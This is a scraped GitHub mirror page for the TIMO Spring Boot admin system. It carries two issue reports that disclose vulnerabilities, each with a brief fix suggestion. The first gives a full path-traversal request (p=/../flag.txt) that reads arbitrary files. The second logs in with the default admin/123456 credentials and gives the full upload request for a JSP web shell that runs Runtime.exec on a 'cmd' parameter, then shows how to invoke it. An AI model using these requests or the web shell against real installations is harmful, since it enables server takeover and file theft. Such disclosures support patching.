Git Product home page Git Product logo

auntvt / timo Goto Github PK

View Code? Open in Web Editor NEW
84.0 1.0 36.0 7.8 MB

TIMO后台管理系统,基于SpringBoot2.0 + Spring Data Jpa + Thymeleaf + Shiro 开发的后台管理系统,采用分模块的方式便于开发和维护,支持前后台模块分别部署,目前支持的功能有:权限管理、部门管理、字典管理、日志记录、文件上传、代码生成等,为快速开发后台系统而生的脚手架!交流群:941209502(已满)、545633945

Home Page: http://www.linln.cn

License: MIT License

Java 88.64% Smarty 0.79% Less 5.86% SCSS 4.71%
springboot jpa thymeleaf shiro jwt timo

timo's People

Contributors

auntvt avatar fanfanfufu avatar suxianbin avatar

Stargazers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Watchers

avatar

Forkers

fengpt worldknoweme lanyxp11 hijackwust forksource dangkunpeng bule-sky d1jk 1178629411 qingyuebao zfsndtl zjbcode happyzxx1988 beyong226 chengcih atkins126 susie6188 xuaxun susihe-dangse xuehua312741499 dylan8888 leon1509 ly774508966 yukz-yumi hx-github-cd sunye423 ferbylv wsljq exchris guangrunshe machh dr-chao silentyearsaccount maikefee yesong17 rosetime hui277205670

timo's Issues

There is a arbitrary file read vulnerability in Timo.

[Vulnerability type]
arbitrary file read

[proof]
image
First we create a file flag.txt in D:\apache-tomcat-9.0.79\webapps\ROOT\flag.txt. The content of the file is "flag{this_is_flag}".

Then we send the http package:

GET /system/user/picture?p=/../flag.txt HTTP/1.1
Host: localhost:8080
sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"
Accept: */*
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8080/system/menu/edit/6
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_a4980171086658b20eb2d9b523ae1b7b=1701849099,1701995116; JSESSIONID=dd7cb592-38d0-415e-93e8-e79fb3b2de25
Connection: close

Response:
image

[Causes of Vulnerability]
image
If we pass the parameter p, it will use p as a part of image path. So we can pass ../../...... to read arbitrary file in the system.

[Fix suggesion]
Add filter to forbidden ".."

There is a remote command execution vulnerability in Timo.

[Vulnerability type]
remote command execution

[Exploit]
start project with Tomcat:
image

log in as admin use default account admin/123456
image

send http package:

POST /upload/image HTTP/1.1
Host: localhost:8080
Content-Length: 279
sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarycmnNKqG4xKTyH1xG
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8080/dev/build
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_a4980171086658b20eb2d9b523ae1b7b=1701849099,1701995116; JSESSIONID=bd38c610-5e87-4046-9a18-4489536b2379
Connection: close

------WebKitFormBoundarycmnNKqG4xKTyH1xG
Content-Disposition: form-data; name="image"; filename="JustAPic.jsp"
Content-Type: image/jpeg

  <%
    Process process = Runtime.getRuntime().exec(request.getParameter("cmd"));
   %>

------WebKitFormBoundarycmnNKqG4xKTyH1xG--

Then we get response:
image

Then we can execute arbitrary cmd in jsp trojan.
http://localhost:8080/upload/images/20240103/16b524e10f8b4dc0aaf0acb139effc8d.jsp?cmd=calc

image
There is no filetype restriction in admin/src/main/java/com/linln/admin/system/controller/UploadController.java. Just add some filters to fix this problem.

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.